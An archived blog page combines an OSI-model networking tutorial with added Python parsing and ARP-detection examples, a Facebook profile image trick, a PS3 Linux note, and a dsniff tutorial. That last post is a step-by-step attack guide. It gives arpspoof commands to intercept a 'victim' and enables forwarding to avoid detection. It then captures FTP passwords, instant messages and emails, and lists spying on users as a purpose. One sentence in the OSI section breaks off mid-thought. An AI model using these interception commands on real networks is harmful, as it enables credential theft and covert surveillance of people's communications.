UrFix's Blog

A geek without a cause

Category: Hacks

  • A network is a communication system that helps computers interact with each other. To enable this interaction, certain rules must be followed. These rules are known as protocols. A protocol is nothing but a set of rules or formats that are followed to create a means of effective communication between two or more computers. It is very difficult to build a protocol that is sufficient to cater to various kinds of applications and computers. Therefore, the need for a common platform that supports protocols at various levels of communication arises. Such a platform is the OSI reference model.
    blog.urfix.com will discuss the different layers of the OSI reference model.

    You will also learn in greater detail about the important layers of network security.

     

    Open Systems Interconnection (OSI)

    The OSI reference model is an open set of definitions that presents a common technical framework for standardization of communication. This framework provides an infrastructure that is sufficient to place mandatory and optional components of effective communication in place. The OSI reference model is divided into several layers. Each layer provides a plug-in space to various components involved in networking. The layers of the OSI reference model are illustrated below.

    [Figure: osi-model]

    The layers of the OSI reference model are as follows:

    • Physical layer
    • Data link layer
    • Network layer
    • Transport layer
    • Session layer
    • Presentation layer
    • Application layer

    Let urfix.com explain each of these layers.

    Physical Layer

    The physical layer is essentially the hardware support layer for networking
    equipment. This layer provides electrical and functional characteristics to
    initialize, maintain, and deactivate physical network links. Network links send
    bit streams of data and understand information only in the form of individual
    bits. The cabling used in a network is an example of a component that operates
    in the physical layer of the OSI model.

    The physical layer takes care of the following components in a network:

    • Transmission medium
    • Means of signaling
    • Timing and clocks
    • Synchronous serial communication

    Network security is not limited to intrusions; it also involves choosing the right
    type of hardware while setting up your network. Therefore, though the physical
    layer might not seem to be a very important part in a secure network, you can’t
    overlook it. For example, poor quality cabling might save initial infrastructure
    costs, but in the long run, it can lead to data loss even in the best protocols, such
    as the User Datagram Protocol (UDP), and cause severe network performance
    problems with other reliable protocols. Therefore, you should always use
    standardized networking equipment and avoid bizarre configurations for your
    network, even if investing in standard networking components pushes the
    networking budget a little higher.

    Data Link Layer

    The data link layer is the second basic layer of the OSI model. It provides a
    functional and procedural medium for the exchange of data between network entities.
    This layer understands data in the form of characters and enables you to initialize
    and maintain data link connections. An example of a component that functions in
    this layer of the OSI model is the standard of the Institute of Electrical and
    Electronics Engineers (IEEE), the IEEE 802.3 or Ethernet. Ethernet is a widely
    accepted standard for LAN, and it can accommodate up to 1024 nodes. If the
    distance is greater, the High-Level Data Link Control (HDLC)-based networks
    are used.

    Network Layer

    The network layer is an important layer from the point of view of a network
    administrator. This layer encapsulates most upper layers of the OSI model and
    provides point-to-point interaction between the two networking components in
    the upper layer. Some components of this layer, such as IP, routers, and ICMP,
    are important for network security. These components are discussed in the
    following sections.

    Internet Protocol

    Internet Protocol (IP) operates in the third layer of the OSI model and provides
    encapsulation facilities to protocols that operate in the higher levels of the model.
    An example of this is shown below.

    Encapsulation of an ICMP packet within the IP protocol.

    The IP protocol uses datagrams to communicate over a packet-switched network.
    In a packet-switched network, every packet of data that is traveling through a
    network is treated as a separate entity. The packet contains a header information
    section, which contains the address of the recipient, and other important details
    about the data within the packet. Intermediate systems, such as routers (discussed
    in the next section), use this header information to forward the packet to the
    correct path or return an error message if the packet cannot be forwarded. An IP
    datagram is depicted below.

    Structure of an IP datagram.

     

    Following is the structure of the IP packet header:

    • Version. This is the version of the IP.
    • IP Header Length. This field contains the size of the IP header. Note
      that this field contains only the length of the IP header and not the
      combined length of all headers that may be encapsulated inside the
      IP packet.
    • Type of Service. This field is usually set to zero and defines the “quality”
      of service that is expected from a network.
    • Packet Size. This field contains the total size of the packet, which is the
      sum of the size of the header and the size of actual data.
    • Identification. This is a 2-byte number that is used by recipient
      computers to arrange fragmented data packets before merging them. More
      information on packet fragmenting and merging can be found in the
      “Routers” section of this chapter.
    • Flags. This is a combination of three bits that inform the intermediate
      systems about the fragmenting feasibility for a packet. The field also
      contains the Don’t Fragment (DF) flag of the IP packet.
    • Fragmentation Offset. This is a 13-bit byte count that starts from the
      first byte of the original packet (the packet before any fragmentation).
      This counter helps the end system, or the recipient computer, to confirm
      correct re-assembly of the packet.
    • Time To Live. This field contains an 8-bit number of hops that a packet
      can sustain. A packet can be routed only up to a certain number of times,
      which is specified in this field. This is done to avoid a scenario in which a
      packet continues to hop infinitely inside a network. Every time a packet
      is passed through a network, this number is decremented by the router.
    • Protocol. This field specifies the type of packet that is encapsulated
      inside the IP packet. A specific number represents each higher level,
      encapsulated protocol type. For example, if the packet being carried is an
      ICMP packet, the value of this field is 1. Similarly, if the packet is a
      TCP packet, the value of this field is 6.
    • Header Checksum. This field is a checksum number that can inform the
      recipient or an intermediate system whether the IP header is corrupted.
      End recipients or intermediate systems discard packets if the checksums
      are wrong. The checksum is initially inserted by the sender of the packet
      and can be updated by every intermediate system if any changes (such as
      fragmentation) are made to the packet.
    • Source Address. This is the IP address of the original sender of the
      packet. This field can be dangerously modified to spoof the identity of
      the sender during a network attack.
    • Destination Address. This is the IP address of the final recipient of the
      IP packet.
    • Options. The options are almost never used. If they are used, however,
      the size of the IP header can be increased.
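
    The field list above, decoded from raw bytes. This is an added example, not code from the original post: the function names and the constructed sample header are assumptions, and the sample reuses addresses that appear later on this page. It also shows why a router that decrements Time To Live has to rewrite the Header Checksum, and that the checksum only detects corruption; it does not authenticate the Source Address.

```python
import ipaddress
import struct

IPV4_FMT = "!BBHHHBBH4s4s"      # the 20 fixed bytes of an IPv4 header
PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}


def internet_checksum(data: bytes) -> int:
    """Ones'-complement sum of 16-bit words; 0 over a header whose checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ipv4_header(packet: bytes) -> dict:
    """Decode the header fields listed above and verify the header checksum."""
    if len(packet) < 20:
        raise ValueError("shorter than the minimum 20-byte IPv4 header")
    (ver_ihl, tos, size, ident, flags_frag, ttl, proto,
     _checksum, src, dst) = struct.unpack(IPV4_FMT, packet[:20])
    version, header_len = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or not 20 <= header_len <= len(packet):
        raise ValueError("not a well-formed IPv4 header")
    header = packet[:header_len]
    return {
        "version": version,
        "header_len": header_len,            # header only, options included
        "type_of_service": tos,
        "packet_size": size,                 # header plus data
        "identification": ident,
        "dont_fragment": bool(flags_frag & 0x4000),
        "more_fragments": bool(flags_frag & 0x2000),
        "fragment_offset": (flags_frag & 0x1FFF) * 8,   # carried in 8-byte units
        "ttl": ttl,
        "protocol": PROTOCOLS.get(proto, str(proto)),
        "checksum_ok": internet_checksum(header) == 0,
        "source": str(ipaddress.IPv4Address(src)),
        "destination": str(ipaddress.IPv4Address(dst)),
        "options": header[20:],
    }


def build_header(src, dst, ttl=64, proto=1, payload_len=8, dont_fragment=True):
    """Build a constructed 20-byte header with a correct checksum (sample data only)."""
    fields = [0x45, 0, 20 + payload_len, 0x1C46, 0x4000 if dont_fragment else 0,
              ttl, proto, 0,
              ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed]
    fields[7] = internet_checksum(struct.pack(IPV4_FMT, *fields))
    return struct.pack(IPV4_FMT, *fields)


def decrement_ttl(header: bytes) -> bytes:
    """What a router does per hop: lower the TTL, then recompute the checksum."""
    h = bytearray(header)
    if h[8] <= 1:
        raise ValueError("TTL expired; the packet would be discarded")
    h[8] -= 1
    h[10:12] = b"\x00\x00"
    h[10:12] = struct.pack("!H", internet_checksum(bytes(h)))
    return bytes(h)


# Constructed sample: an ICMP packet header from 192.168.1.33 to 192.168.1.1.
SAMPLE_HEADER = build_header("192.168.1.33", "192.168.1.1")

if __name__ == "__main__":
    for name, value in parse_ipv4_header(SAMPLE_HEADER).items():
        print(f"{name:16} {value}")
```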

    Routers

    Routers are computers or gadgets that do not directly store usernames or act as a
    server or a client. Routers operate at the Network Layer 3 (L3) of the OSI model.
    They forward data to the intended recipient. Routers may be used to connect two or more IP networks or to connect an IP network to an Internet connection.
    Although routers need not know the information being sent through them, they
    might modify certain aspects of the information to enable information packets to
    reach the correct destination.
    A router, in physical terms, consists of a computer with a minimum of two
    network interface cards. Both these network cards should support IP. A router
    receives a packet from each interface and forwards the received packets to an
    appropriate output network interface. All packets received by the router have
    data link layer (L2) protocol headers. The router removes these headers and adds
    a new data link layer header to the packet. After the new header is added to the
    packet, it can be transmitted using the appropriate network interface.
    A router reads the network layer header or IP header information before it can
    decide the following:

    • Should the packet be forwarded?
    • Which network interface should the packet be forwarded to?

    A series of steps is involved in routing a packet. These steps are shown here:

    1. The router receives a packet.
    2. The packet’s header information is extracted.
    3. The destination IP address of the packet is extracted.
    4. If the size of the packet is larger than the Maximum Transmission Unit
    (MTU) and the packet’s header information has a Don’t Fragment (DF)
    flag set, the packet is discarded. A message of failure is sent to the
    original sender of the packet.
    5. If the size of the packet is larger than the MTU but the DF flag is not
    set, the packet is broken down into smaller fragments.
    6. The best path for the packet is found by searching the routing table
    stored inside the router.
    7. If the size of the original packet is larger than the MTU, the small
    fragments are dispatched through the appropriate network interface.
    Otherwise, the packet is forwarded to its destination address.
    8. The packet fragments are collected at the destination and reassembled.
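
    The forwarding steps above as a small decision function. This is an added example, not code from the original post: the interface names, MTU values and routing table are constructed. It looks up the route before the MTU check, because the MTU is a property of the outgoing link, and it models the failure message as ICMP Destination Unreachable with the "fragmentation needed" code.

```python
import ipaddress

ICMP_FRAG_NEEDED = (3, 4)   # Destination Unreachable / fragmentation needed and DF set


def lookup_route(table, default_iface, dst):
    """Longest-prefix match over (network, interface) entries, else the default interface."""
    addr = ipaddress.ip_address(dst)
    best = None
    for network, iface in table:
        net = ipaddress.ip_network(network)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else default_iface


def fragment(total_len, header_len, mtu):
    """Return (offset_bytes, payload_len, more_fragments) for each fragment."""
    payload = total_len - header_len
    # Every fragment except the last must carry a multiple of 8 payload bytes,
    # because the Fragmentation Offset field counts 8-byte units.
    chunk = (mtu - header_len) // 8 * 8
    if chunk <= 0:
        raise ValueError("MTU too small to carry any payload")
    fragments, offset = [], 0
    while offset < payload:
        size = min(chunk, payload - offset)
        fragments.append((offset, size, offset + size < payload))
        offset += size
    return fragments


def route_packet(packet, table, default_iface, mtu_by_iface):
    """Decide what the router does with one packet (steps 3 to 7 above)."""
    iface = lookup_route(table, default_iface, packet["dst"])
    mtu = mtu_by_iface[iface]
    if packet["total_len"] <= mtu:
        return {"action": "forward", "iface": iface}
    if packet["dont_fragment"]:
        # Discard and report the failure to the original sender.
        return {"action": "drop", "iface": iface, "icmp_to_sender": ICMP_FRAG_NEEDED}
    return {"action": "fragment", "iface": iface,
            "fragments": fragment(packet["total_len"], packet["header_len"], mtu)}


# Constructed sample: an Ethernet LAN, a second LAN, and a WAN link with a smaller MTU.
ROUTES = [("192.168.1.0/24", "eth0"), ("10.0.0.0/8", "wan0"), ("10.20.0.0/16", "eth1")]
DEFAULT_IFACE = "wan0"
MTU = {"eth0": 1500, "eth1": 1500, "wan0": 576}


def demo(dst, dont_fragment):
    packet = {"dst": dst, "total_len": 1500, "header_len": 20,
              "dont_fragment": dont_fragment}
    return route_packet(packet, ROUTES, DEFAULT_IFACE, MTU)


if __name__ == "__main__":
    print(demo("192.168.1.33", False))   # fits the LAN MTU
    print(demo("10.1.2.3", False))       # fragmented for the WAN link
    print(demo("10.1.2.3", True))        # dropped, sender is told why
```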

    Routing tables have the same format as the tables in network bridges
    and switches. The difference is that routers are identified by the IP addresses of
    computers instead of MAC hardware addresses.

    The routing table is nothing but a list of known IP destination addresses and the
    associated network interfaces that can be used to reach the destinations. Routers
    also have a provision for a default network interface. This interface may be used
    for all addresses that are not mentioned in a routing table. Routers also provide
    packet filters. The packet filter simply discards unwanted packets, which can
    cause an unnecessary overload on networks. The filter can be used as a firewall,
    and unsupported protocols can be blocked outside the router. Such a firewall, to
    some extent, can provide basic security to prevent unauthorized users from
    entering a network using remote computers.
    The basic purpose of a router is to forward packets from one IP network to
    another IP network. A router determines the broadcast IP destination of a
    network from the logical AND of an IP address and its associated subnet mask. If a
    router isn’t configured properly, a serious security threat can occur when a packet
    is sent to a network broadcast address. If a large number of packets is forwarded,
    your network might face the problem of network overload.
    Routers are often used to connect different types of networks. A router can connect networks that use totally different link methodologies. For example, an HDLC link can connect a WAN to an Ethernet-based LAN, as shown below.

    Role of routers in a network.

    The important thing to note here is that each of these networks has a different
    MTU. This is due to the fact that optimization levels for packet sizes are
    different for the two networks. Therefore, whenever a packet comes from the network
    that has a bigger MTU and needs to go to the network with a smaller MTU

     

    Transport Layer

    The fourth layer in the OSI reference model is the transport layer. This layer
    facilitates data transfer between two end systems by encapsulating the data packet
    within the network layer data packet. Two important components of the transport
    layer are TCP and the UDP protocol, which are discussed in detail in this section.

    TCP is a connection-oriented and reliable transport protocol. A
    connection-oriented protocol implies that two hosts, wanting to communicate with
    each other, must first establish a connection before actual data exchange can take
    place. In TCP, a connection is established using a three-way handshake. TCP assigns
    sequence numbers to every packet in each segment, and all data received is
    responded to with an acknowledgement to the sender. TCP hides perplexing
    network details from the upper layers of the IP protocol.

    Information Fields in a TCP Packet
    A typical TCP packet contains the following six information fields along with
    actual data:

    • Synchronize Sequence Numbers (SYN). This field is valid only during
      the three steps involving the handshake. The sequence number is read by
      the receiving host and is stored as the client computer’s first sequence
      number. TCP sequence numbers are 32-bit numbers, ranging from 0 to
      4,294,967,295 (2 ^ 32). Every packet of data that is exchanged between
      two computers using a TCP connection is sequenced.
    • Acknowledgement (ACK). This field is generally set. The
      acknowledgement number field in the TCP header contains the assumed value of the
      next sequence number. This field is also an acknowledgement of the data
      received in the previous packet.
    • Reset (RST). This field informs the other computer that the connection
      has been dropped and all memory structures have been flushed.
    • Urgent (URG). This field informs the other computer to process data on
      a priority basis.
    • Push (PSH). This field informs the other computer to pass the data to
      the concerned application as soon as possible instead of putting the data
      in the queue. This flag is generally set in interactive connections, such as
      Telnet, rlogin, and some chat applications.
    • Finish (FIN). This field informs the other computer that the
      transmission of data is complete, but the host is still open to accepting data.

    User Datagram Protocol (UDP)

    The US Department of Defense (DoD) developed UDP for use with IP. Unlike
    TCP, which first tries to establish a reliable connection with the server, UDP
    works on the concept of “best-effort mechanism.” However, UDP is an unreliable
    protocol for communication because of the following reasons:

    1. No error is generated for lost data packets.
    2. No error is generated for duplicate packets.
    3. No assurance is provided that a packet has reached the destination safely.

    In simpler terms, UDP is a one-way protocol—what is sent from the client
    is gone for good. The client will never hear any further information about this
    packet.
    Some reliability is provided in UDP, in that the end recipients reject packets
    that are corrupted during transit. It’s the responsibility of the upper layer
    application to check such loss. In addition, because no packet acknowledgement is
    required in UDP, the network load is reduced to a certain extent.

    Structure of a UDP packet.

     

     

    The UDP header consists of four fields, each two bytes in length:

    • Source Port
    • Destination Port
    • UDP Data Length
    • UDP Checksum

    UDP is unsuitable for many applications, although the simplicity of the protocol
    gives performance advantage to those applications that do not require much
    reliability. An example of such an application is one that pertains to streaming
    video and audio content.

     

    What Are Ports?

    Port is a term that is used often in networking. Regardless of whether your computer is online or offline, your computer has a number of open channels to which various programs or other computers can connect. These channels are known as ports. Obviously, if your computer isn’t connected to a network, only the local program will be able to access these ports. Once a computer is online, however, anyone on the network can execute a client program on their remote computer to connect to these ports. Ports are channels created between two computers for the exchange of information. A computer can have many open ports for receiving connection requests. For example, a server that has SSH, HTTP, SMTP, POP, FTP, and Telnet services can have five open ports. The default port numbers of SSH, HTTP, SMTP, POP, FTP, and Telnet are 22, 80, 25, 110, 21, and 23, respectively. These ports are not hardware components, but are like virtual stations within your computer’s memory. All computers have them, including the server you dial to access the Internet. When a computer is turned on, a number of ports are virtually created. These remain open and search for programs that are running on remote or local computers. This process is known as listening. If another computer wishes to connect to a port on your computer, it can do this in two ways: by being offered a port address to connect to, or by scanning available open ports. Sometimes, your computer willingly gives a port number to another computer to make a connection. At other times, the other computer might just guess or try one of the universally known port numbers. However, hackers might also choose to run a port scan through your computer from a remote location. A port scanner is software that allows a user to search all ports that a server is listening to. 
    When such a program is used, the user simply has to type the IP address of the desired computer, and the scanner presents a complete report of all ports that are being listened to by the host computer.
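
    To see what a scan of your own machine would find, you can list its listening TCP ports yourself. This is an added example, not code from the original post: it parses text in the Linux /proc/net/tcp format (the embedded table is constructed, and the address decoding assumes a little-endian host), and the set of ports marked as cleartext logins is an assumption added here.

```python
import socket
import struct

# Default port numbers named in the paragraph above.
SERVICE_NAMES = {21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP", 80: "HTTP", 110: "POP"}
# Assumption added for this example: services whose logins cross the wire unencrypted.
CLEARTEXT_LOGIN = {21, 23, 110}
TCP_LISTEN = "0A"   # socket state code for LISTEN in /proc/net/tcp


def decode_endpoint(field):
    """Turn '0100007F:0019' into ('127.0.0.1', 25)."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def listening_sockets(proc_net_tcp):
    """Return one record per listening TCP socket, sorted by port."""
    found = []
    for line in proc_net_tcp.strip().splitlines()[1:]:     # skip the column header
        cols = line.split()
        if len(cols) < 4 or cols[3] != TCP_LISTEN:
            continue                                        # established, closing, ...
        ip, port = decode_endpoint(cols[1])
        found.append({
            "port": port,
            "bind": ip,
            "service": SERVICE_NAMES.get(port, "unknown"),
            # Loopback listeners are only reachable from local programs.
            "reachable_from_network": not ip.startswith("127."),
            "cleartext_login": port in CLEARTEXT_LOGIN,
        })
    return sorted(found, key=lambda s: s["port"])


# Constructed sample in /proc/net/tcp layout (trailing columns shortened).
SAMPLE = """
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33
   2: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0
   3: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0
   4: 2101A8C0:0016 2301A8C0:C350 01 00000000:00000000 02:000A1B2C 00000000     0
"""

if __name__ == "__main__":
    for s in listening_sockets(SAMPLE):
        note = "  <-- cleartext login" if s["cleartext_login"] else ""
        scope = "network" if s["reachable_from_network"] else "local only"
        print(f'{s["port"]:>5} {s["service"]:<7} {s["bind"]:<10} {scope}{note}')
```

    On a Linux host, pass the contents of /proc/net/tcp instead of SAMPLE to audit the real machine.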

    Session Layer and Presentation Layer

    The session layer is the fifth layer in the OSI model, and it offers a channel to
    session-based services, such as:

    • Telnet. Telnet is a protocol that can be used to perform remote logins
      and operate a remote computer from a virtual terminal.
    • FTP. FTP is used for transferring files between two connected
      computers.

    Both these protocols maintain user sessions from the time they log on to the time
    they log out. The session layer supports a feature that helps in structuring response
    dialogues between computers. This feature allows two-way simultaneous or
    alternative cross-network operations.
    The presentation layer supports a common syntax and provides conversion
    facilities from one type of network to another. This layer also permits computers to be
    referenced by their names, rather than by their difficult-to-remember addresses.
    The presentation layer defines how applications should use a network. An
    example of a component that operates in this layer is the SMB protocol. The SMB
    protocol provides naming facilities and file sharing features in Windows and
    UNIX-based networks, using appropriate servers.

    Application Layer

    The application layer is the uppermost layer in the OSI model. This layer is used
    directly by applications. Data belonging to this layer cannot generally travel in a
    network on its own and requires encapsulation by another layer to reach the destination.
    The application layer can be considered the cause of the existence of all other layers of the OSI model. The other layers in the OSI model carry the application
    layer data. All services in a server send application layer data packets. Similarly, all client programs exchange data using this protocol. This layer does all the actual work and is supported by the other layers. Some programs that operate in this layer are:

    • E-mail servers and clients, such as sendmail
    • Web servers and clients, such as Apache
    • DNS servers, such as BIND

    Summary

    You learned about the different layers of the OSI model and their
    roles in a network. I discussed the data link, network, transport,
    session, presentation, and application layers of the OSI reference model.
    UrFix knows you will find these basic fundamentals in all networking technologies that use
    the Internet.

     

     

  • There are a lot of changes in Facebook lately, small and large which you can read about in great detail at TechCrunch.

    Here are a few:

    • A stream of your recent tagged photos appears at the top of the screen, and there are more pictures of your friends on the page. This is because the main problem with Facebook is that there weren’t enough opportunities to see pictures of people.
    • Now there’s a field on your page called “philosophy,” which folds in your religious, political views and favorite quote. Plus a brand new field: “People Who Inspire You.” (If you put Mark Zuckerberg you should be able to get access to a special Super Facebook.)
    • All your vital stats are squished up under your name in a list now. It actually looks pretty good, like you’re a character in a Role Playing Game or something!
    • There is also a field for sports, if you can somehow fit physical activity in between checking your Facebook profile
    • Tabs bring up different sections of your profile. Tabs: So hot right now.

    I’m going to show you how to create the “Famous New Profile Hack” using GIMP

    Let’s begin

    Start by picking the picture you would like to use.

    Take a screen-shot of your Facebook profile.

    Open your new profile screen-shot inside of GIMP.

    Paste the first picture you chose to use in step one as a new layer.

    Now grab the GIMP side ruler and drag two guides to 200 width and 600 height.

    Now grab the select tool and copy in between the new guides,

    and select Edit -> Paste as new image.

    Save that new image as profile.jpg.

    Now create a guide for each small picture in the profile.

    Zoom in if you have to.

    I decreased the opacity of the original picture just to see if it will align properly.

    Now with the select tool grab the first box,

    copy it,

    and paste it as a new image.

    Copy each box and paste it as a new image for the rest of the boxes.

    Now we should have 5 small pictures and the long profile picture.

    Go to Facebook, create an album and make sure “EVERYONE” is selected.

    Upload the picture labeled profile.jpg and make this your profile picture.

    We are almost done.

    Now start tagging your photos.

    Start from last to first.

    Select the last pic and tag it as yourself.

    Hit previous and tag the next one, and so forth.



    You are done. Wasn’t that easy?

  • PS3 CD builds stopped for Natty

    Official Statement

    Of course, Sony offered the option to not update your PS3 console if you still wanted to have a Linux operating system installed on it (or to back up your data from the Linux partition), but, on the other hand, you will no longer have access to various important features, such as signing into the PlayStation Network!

    http://news.softpedia.com/news/It-s-Official-Sony-Doesn-t-Support-Linux-Anymore-139051.shtml

    http://blog.us.playstation.com/2010/03/28/ps3-firmware-v3-21-update/

    The new update release notes said very clearly that it would remove the “Other OS” function!

    If you have a good reason why we should keep building PS3 CD images for
    Natty, and are willing to step up as a developer to help support them,
    then please reply to ubuntu-devel at lists.ubuntu.com.
    
    
  • urlsnarf

    urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

    I want to talk about a set of tools that have given me the creeps, not only because of its power, but because of its simplicity in carrying out sniffing techniques. This is the dsniff suite, a wonderful set of tools designed by Dug Song to audit your own network, but in the hands of ‘others’ it becomes the “bastard’s kit”.

    There are a few reasons why you would want to use this tool:
    1) You host a web server and want to monitor websites viewed and where they were referred from (in real time)
    2) You offer Linux proxy shells and want to see the websites your guests are viewing
    3) Sniff websites visited on the LAN
    4) Spy on your users

    Installing this tool is easy and simple:

    apt-get install dsniff

    The suite consists of the following tools:

    * dsniff -> Password sniffer
    * filesnarf -> Captures and saves files passed via NFS
    * mailsnarf -> Captures POP3 and SMTP traffic, saves the output in mailbox format
    * msgsnarf -> Logs messages from instant messaging sessions, such as MSN
    * webspy -> View real-time web traffic to the victim by injecting traffic into the browser
    * arpspoof -> Poisons the ARP cache
    * dnsspoof -> Fakes DNS responses
    * macof -> Floods the network with fake MAC addresses, causing DoS
    * sshow -> Analyzes traffic in SSH version 1 and 2
    * tcpkill -> Kills established connections
    * tcpnice -> Slows down connections

    Simple URL Capture

    urlsnarf -i eth0


    Cleaning up. The default urlsnarf mode also gives you a lot of crap to deal with. Using

    urlsnarf -i eth0 |cut -d\" -f4

    only displays the site visited.

    MITM

    The first attack we’re going to see is how to make a classic MITM; we will then move on to other attacks.
    For this we will use arpspoof. Suppose we have the following scenario:

    Vict (192.168.1.33) <—> Rout (192.168.1.1 )<—> Atac (192.168.1.35)

    To get the MITM, the connection from the victim to the router has to pass through us, and the reverse connection from the router to the victim has to pass through us as well, leaving the scene as follows:

    Router <=====> Attacker <=====> Victim

    To do this, open a terminal as root and run:

    arpspoof -i eth0 -t 192.168.1.33 192.168.1.1

    Then, in another terminal as root, we cover the second channel of communication:

    arpspoof -i eth0 -t 192.168.1.1 192.168.1.33

    Notice that we enable forwarding so that we act as a router and send packets on to their rightful owner.

    echo 1 > /proc/sys/net/ipv4/ip_forward

    If we do not do this, the traffic to the victim is cut, their connection is lost, and you might be discovered.

    Now we can check whether the attack is underway with arp -a; we know it is because the MAC address of the router will coincide with ours. We have poisoned the ARP cache of the victim, and the IP packets for the router will be sent to our MAC address. We can also detect whether we are victims of this attack by checking whether our own ARP table contains duplicate MAC addresses.

    Important! Do not close any windows console which is running arpspoof, since it would stop the attack!
    We have now launched the MITM.
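
    The ARP-table check described above, written as a detector you can run on your own hosts. This is an added example, not code from the original post: it parses text in the Linux /proc/net/arp format, the sample table and MAC addresses are constructed around the page's 192.168.1.x scenario, and the known-good gateway MAC is an assumed baseline recorded while the network was trusted. The baseline comparison matters because a poisoned table does not always contain a second entry with the same MAC.

```python
from collections import defaultdict

ATF_COM = 0x2   # "entry complete" flag in /proc/net/arp


def parse_arp_table(text):
    """Parse /proc/net/arp-style text into (ip, mac, device) tuples."""
    entries = []
    for line in text.strip().splitlines()[1:]:             # skip the column header
        cols = line.split()
        if len(cols) < 6:
            continue
        ip, _hw_type, flags, mac, _mask, device = cols[:6]
        if not int(flags, 16) & ATF_COM or mac == "00:00:00:00:00:00":
            continue                                        # unresolved entry
        entries.append((ip, mac.lower(), device))
    return entries


def find_shared_macs(entries, gateway):
    """Report MAC addresses that answer for more than one IP on the same interface."""
    by_mac = defaultdict(set)
    for ip, mac, device in entries:
        by_mac[(device, mac)].add(ip)
    return [{"device": device, "mac": mac, "ips": sorted(ips),
             "gateway_involved": gateway in ips}
            for (device, mac), ips in by_mac.items() if len(ips) > 1]


def gateway_mac_changed(entries, gateway, known_good_mac):
    """Compare the gateway's current MAC with a baseline; None if no entry exists."""
    for ip, mac, _device in entries:
        if ip == gateway:
            return mac != known_good_mac.lower()
    return None


# Constructed sample: the gateway and another host resolve to the same MAC.
GATEWAY = "192.168.1.1"
KNOWN_GOOD_GATEWAY_MAC = "00:11:22:33:44:01"      # assumed baseline value
POISONED = """
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:35     *        eth0
192.168.1.35     0x1         0x2         aa:bb:cc:00:00:35     *        eth0
192.168.1.34     0x1         0x2         00:11:22:33:44:34     *        eth0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        eth0
"""
CLEAN = """
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:01     *        eth0
192.168.1.34     0x1         0x2         00:11:22:33:44:34     *        eth0
"""

if __name__ == "__main__":
    for name, table in (("poisoned", POISONED), ("clean", CLEAN)):
        entries = parse_arp_table(table)
        print(name, find_shared_macs(entries, GATEWAY),
              gateway_mac_changed(entries, GATEWAY, KNOWN_GOOD_GATEWAY_MAC))
```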

    Stealing FTP passwords

    I know it is no myth that FTP is not secure, but to illustrate how it works dsniff will suffice ;)
    Once the MITM attack has been placed on the machine we listen via dsniff with:

    dsniff -i eth0

    Now go to the victim machine and open an FTP session with any provider …
    Seems like dsniff has something for us!

    Spy Messenger Conversations

    It is also possible to spy on conversations using msgsnarf tool.
    Having previously made the MITM we do:

    msgsnarf -i eth0

    Now the whole MSN conversation will be displayed on your screen.

    Capture emails

    Activating mailsnarf:

    mailsnarf -i eth0

    We are able to capture all emails sent via Outlook, Thunderbird … etc from our victim. If you also activated dsniff, it probably captured the password to the email account. With mailsnarf we will get the body of the message sent.

    WARNING!! Do not do this on any networks that you do not own. Unless you are a PAID administrator or it is your own network, I highly advise against any of these techniques.
